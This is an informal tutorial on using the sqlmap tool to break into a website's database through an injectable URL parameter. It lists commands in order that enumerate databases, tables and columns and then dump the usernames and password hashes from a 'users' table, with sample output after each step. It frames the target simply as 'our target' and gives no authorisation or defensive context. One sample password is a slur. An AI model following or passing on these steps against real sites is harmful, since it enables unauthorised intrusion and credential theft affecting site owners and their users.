Tutorial SQLMAP By GrenXPaRTa

1. the first command were going to use will scan the target for vulns
2.  
3. sqlmap -u "http://www.hackme.com/index.php?id=1" --dbs
4.  
5. obviously we would replace the url with our targets url, now sqlmap will start
6. scanning, in some cases it will ask if you want to skip scans to save time,
7. we do not want to skip scans so just type 'n', it may also ask if you want to include
8. certain types of scans we always want to say 'y' skipping scans is being lazy and
9. sqlmap might say our target is not vuln when because we skipped a few scans that
10. contained the vuln we would exploit. so never skip scans and always include all scan
11. types when asked.
12.  
13. sqlmap will output our targets database names in a similar format below.
14. if a database contains the "information_schema" db then navigateing through
15. the database should be a breeze. however if id does not contain it you will
16. end up haveing to brueforce your way through the database to get table names
17. and column names.
18. +-------------------+
19. |information_schema |
20. |database_name      |
21. |test_db            |
22. +-------------------+
23. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" --table
24.  
25. this command will list the tables of the database you selected, when you select a database you
26. do ot want to select "information_schema" most of the data requires "root" to access or in other
27. words you will need to be an admin to read the data.
28.  
29. +-------------------+
30. |products           |
31. |random_shit        |
32. |users              |
33. +-------------------+
34.  
35. above we have an example of a table list, the primary table we are going to access is the "users"
36. table so we type the following:
37.  
38. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" --columns
39.  
40. this command will access the columns inside the table, the output from sqlmap will look sorta like
41. the one below.
42.  
43. +-------------------+
44. |id                 |
45. |user_name          |
46. |full_name          |
47. |location           |
48. |ip_address         |
49. |last_name          |
50. |password           |
51. +-------------------+
52.  
53. above is an example of what you will see when retrieveing the collumns.
54. the main ones we want to access are the ones that contain the username and password,
55. the command to access the data in the columns is below.
56.  
57. i find it easy to open a few new terminal windows and access the usernames and passwords at the
58. same time.
59.  
60. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "user_name" --dump
61. sqlmap -u "http://www.hackme.com/index.php?id=1" -D "database_name" -T "users" -C "password" --dump
62.  
63. now the out put will be the same as the others except with usernames
64.  
65. +-------------------+
66. |admin              |
67. |user1              |
68. |user2              |
69. +-------------------+
70.  
71.  
72. and there are 2 outcomes for the password output:
73. outcome1:
74.  
75. +-------------------+
76. |admin              |
77. |irrandom           |
78. |iamhomo69          |
79. +-------------------+
80.  
81. outcome2:
82.  
83. +--------------------------------+
84. |c02b7d24a066adb747fdeb12deb21bfa|
85. |96e79218965eb72c92a549dd5a330112|
86. |f1981e4bd8a0d6d8462016d2fc6276b3|
87. +--------------------------------+